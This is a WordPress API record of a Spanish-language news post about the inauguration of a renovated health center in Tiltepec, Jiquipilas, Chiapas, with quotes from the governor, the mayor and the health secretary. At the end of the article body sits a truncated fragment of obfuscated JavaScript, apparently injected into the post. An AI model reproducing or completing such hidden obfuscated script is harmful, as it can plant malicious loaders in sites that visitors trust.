{"id":806,"date":"2022-03-22T02:33:46","date_gmt":"2022-03-22T02:33:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=806"},"modified":"2022-03-22T02:33:47","modified_gmt":"2022-03-22T02:33:47","slug":"gobierno-del-estado-inaugura-reconversion-del-centro-de-salud-del-ejido-tiltepec-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=806","title":{"rendered":"Gobierno del Estado inaugura reconversi\u00f3n del centro de salud del ejido Tiltepec en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" data-id=\"807\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.04-PM.jpeg\" alt=\"\" class=\"wp-image-807\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.04-PM.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.04-PM-300x200.jpeg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"960\" data-id=\"808\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.07-PM-1.jpeg\" alt=\"\" class=\"wp-image-808\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.07-PM-1.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.07-PM-1-225x300.jpeg 225w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" data-id=\"809\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.07-PM.jpeg\" alt=\"\" class=\"wp-image-809\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.07-PM.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-21-at-8.05.07-PM-300x200.jpeg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u2022 El alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez agradeci\u00f3 al gobernador Rutilio Escand\u00f3n Cadenas por la importante inversi\u00f3n para la reconversi\u00f3n de este Centro de salud.<br>\u2022 Solventar necesidades de atenci\u00f3n m\u00e9dica y dotar de equipo, personal y medicamentos.<\/p>\n\n\n\n<p>21 de marzo del 2022. Jiquipilas, Chiapas._ Como parte del fortalecimiento y dignificaci\u00f3n de los espacios f\u00edsicos de la red hospitalaria de la entidad, que busca garantizar servicios de salud dignos, oportunos y de calidad a la poblaci\u00f3n, se llev\u00f3 a cabo la inauguraci\u00f3n de la reconversi\u00f3n del Centro de Salud del ejido de Tiltepec, en el municipio de Jiquipilas, que otorgar\u00e1 servicios de medicina general, promoci\u00f3n de la salud, medicina preventiva, vacunaci\u00f3n, \u00e1rea de hidrataci\u00f3n, estimulaci\u00f3n temprana, farmacia, entre otros rubros.<\/p>\n\n\n\n<p>En el acto, el gobernador Rutilio Escand\u00f3n Cadenas sostuvo que la consolidaci\u00f3n de este tipo de proyectos prioritarios y con alto sentido humanitario, no representan una d\u00e1diva sino justicia social, pues adem\u00e1s de cumplir con el derecho humano de acceso a la salud, se atiende las necesidades m\u00e1s sensibles y se contribuye a la igualdad de las personas y de los pueblos. \u201cLa salud es parte fundamental en la b\u00fasqueda de igualdad entre pueblos y personas\u201d expres\u00f3.<\/p>\n\n\n\n<p>Subray\u00f3 que en materia de salud no se escatiman recursos para que las cl\u00ednicas y los hospitales, tanto en las zonas urbanas como rurales, sean espacios dignos y de calidad, que cuenten con el equipamiento tecnol\u00f3gico, las herramientas, los insumos, medicamentos y el personal de salud necesario y especializado, con el objetivo de cuidar la salud y brindar bienestar a las y los habitantes.<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, el municipe destac\u00f3 que para la comunidad es gratificante ver concretada la rehabilitaci\u00f3n de esta unidad m\u00e9dica, la cu\u00e1l responde a una petici\u00f3n a\u00f1eja y forma parte de las estrategias que se desarrollan en la entidad para atender a las necesidades prioritarias y otorgar beneficios que garanticen bienestar social a las familias. Reconoci\u00f3 las pol\u00edticas p\u00fablicas que impulsa el gobernador del estado para llevar la transformaci\u00f3n de resultados y generar un progreso en cada sector social, as\u00ed tambi\u00e9n extern\u00f3 su agradecimiento por todos los apoyos y proyectos aterrizador en el municipio.<\/p>\n\n\n\n<p>Hugo L\u00e1zaro dijo que adem\u00e1s de la reconversi\u00f3n necesaria y urgente del centro de salud, tambi\u00e9n facilit\u00f3 recursos para rehabilitar caminos rurales que conectan a los ejidos y la colocaci\u00f3n de m\u00e1s de 250 luminarias en la cabecera municipal que fortalecen el esquema preventivo.<\/p>\n\n\n\n<p>\u201cLa reconversi\u00f3n mejor\u00e1 los servicios de salud para la comunidad, contando con una mejor infraestructura, \u00e1reas completas y dotado de equipo, material y personal de salud\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo refrend\u00f3 el compromiso del gobierno municipal de Jiquipilas para trabajar de la mano del gobierno del estado para llevar mejores apoyos y beneficios para las y los Jiquipiltecos.<\/p>\n\n\n\n<p>Por su parte el secretario de Salud, Jos\u00e9 Manuel Cruz Castellanos inform\u00f3 que con la reconversi\u00f3n de esta cl\u00ednica, las y los usuarios no s\u00f3lo contar\u00e1n con un espacio digno sino con personal de salud y equipamiento especializados y medicamentos suficientes para que se otorgue un servicio completo y puedan solventar cualquier problema de salud p\u00fablica en la comunidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 El alcalde C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez agradeci\u00f3 al gobernador Rutilio Escand\u00f3n Cadenas por la importante inversi\u00f3n para la reconversi\u00f3n de este Centro de salud.\u2022 Solventar necesidades de atenci\u00f3n m\u00e9dica y dotar de equipo, personal y medicamentos. 21 de marzo del 2022. Jiquipilas, Chiapas._ Como parte del fortalecimiento y dignificaci\u00f3n de los espacios f\u00edsicos de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":807,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-806","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/806","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=806"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/806\/revisions"}],"predecessor-version":[{"id":810,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/806\/revisions\/810"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/807"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=806"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=806"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=806"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}